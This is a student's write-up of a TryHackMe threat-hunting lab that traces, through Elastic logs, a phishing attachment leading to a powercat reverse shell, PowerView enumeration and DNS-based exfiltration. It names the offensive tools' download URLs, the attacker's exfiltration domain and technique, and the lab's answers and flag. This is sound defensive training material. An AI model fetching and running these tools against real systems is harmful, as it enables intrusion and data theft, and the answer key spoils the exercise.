Hunt Me I: Payment Collectors — Write-up

This exercise on https://tryhackme.com/room/paymentcollectorsis is my second activity on TryHackMe, the first being on “Become a Hacker.” Sincere thanks to my professor, Sazzad Hossain, for introducing me to such intellectually stimulating and fun exercises on TryHackMe. Now, let us get started on the task at hand.

After successfully accessing https://tryhackme.com/room/paymentcollectors, I logged into the Elastic login page using the credentials — elastic, for both the username and password respectively. Now, it was time to find the name of the ZIP attachment that was downloaded by Michael. To do this, the search parameters were organized to include file.extension, user.name, and file.name. The choices for these parameters were based on the fact that the downloaded file is in a .zip format, the user involved is named Michael and with the “file.name” parameter, the exact file in question will be easier to trace. After a more comprehensive examination of the log data that included a specified date range, voilà! The name popped up as Invoice_AT_2023–227.zip as evidenced in the highlighted portion of the screen capture below.

Continuing, it was time to look for the contained file that Michael extracted from the attachment. To have this done, I again queried Invoice_AT_2023–227.zip by adding a new column titled file.path. The result returned Payment_Invoice.pdf.lnk.lnk as the extracted file that I was looking for as can be seen in the screenshot below:

In answering the question, “What was the name of the command-line process that spawned from the extracted file attachment?” I did some Google searches first, to help me understand the question, and second, to understand what needed to be done. My search came back with several options from which I decided to try adding a new column called process.command_line and process.name. Hooray! It returned as powershell.exe as depicted in the screen capture below:

Furthermore, in order to find out “what URL the attacker used to download a tool to establish a reverse shell connection” to gain remote command-line access to the machine thereby allowing them to take control of the system from afar, I simply opened out the “process.command_line cell” a little bit more so I can extract more detailed information from the field. After this was done, I found the answer right there to be: https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 which represents the precise URL that the attacker deployed within the command line arguments.

To unravel the port that the workstation connected to the attacker, a close examination of the result of the step we just concluded was carried out and it was discovered that the port was 19282. This is highlighted in the screen capture given below:

Nevertheless, in trying to find the solution to the question, “What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?” The following search criteria ‘winlog.event_id:1’ along with ‘exe’ was applied first to filter the logs, and then, isolate every record that features “log event ID 1” and that also mentions ‘exe’ in the process details. Eventually, the executable file was identified as “systeminfo.exe” as shown in the screen capture below:

The url is https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1as can be seen in the highlighted portion of the screen capture below:

To find the name of the file share that the attacker mapped to Michael’s workstation, we included the “use” command in our search parameters, and the name of the file was returned as SSF-FinancialRecordsas shown in the SS below.

NB: The “use” command is typically deployed for mapping network drives.

To answer the question, “What directory did the attacker copy the contents of the file share to?” The data was transferred into the directory located at C:\Users\michael.ascot\downloads\exfiltration, utilizing the Robocopy.exe application as could be seen below:

With regard to the name of the Excel file the attacker extracted from the file share, it can be seen to be an Excel document titled ClientPortfolioSummary.xlsx and it is located within the exfiltration folder.

To find the name of the archive file that the attacker created to prepare for exfiltration was quite an easy one. This is because retrieving the file was simply straightforward once it was determined that the destination folder for the copied contents was labeled “exfiltration.” So, in our case, the file is exfilt8me.zip

The MITRE ID is T1048

To ascertain the MITRE ID of the technique that the attacker used to exfiltrate the data, this filter: winlog.event_id: (1 OR 3) was deployed in order to include Sysmon event IDs 1 and 3. A closer examination of the network behavior showed that commands like whoami, net, and particularly nslookup were used.

The domain of the attacker’s server that retrieved the exfiltrated data is: haz4rdw4re.io as depicted in the screen capture below:

On the question, “the attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?” The following was done:

a) nslookup queries within a multitude of log entries were pinpointed.

b) the dispatched data segments were scrutinized.

c) A review of the process.command.line data was done which revealed the utilization of Base64 for encoding.

d) To analyze the latest batch of files that were transmitted, CyberChef was deployed as a tool for decoding.

e) With that, the focus became more on two distinct data fragments namely: RmYjEyNGZiMTY1NjZlfQ== and VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm

And, after isolating the above two segments, CyberChef was then deployed to decode them, giving the result: THM{1497321f4f6f059a52dfb124fb16566e} as the flag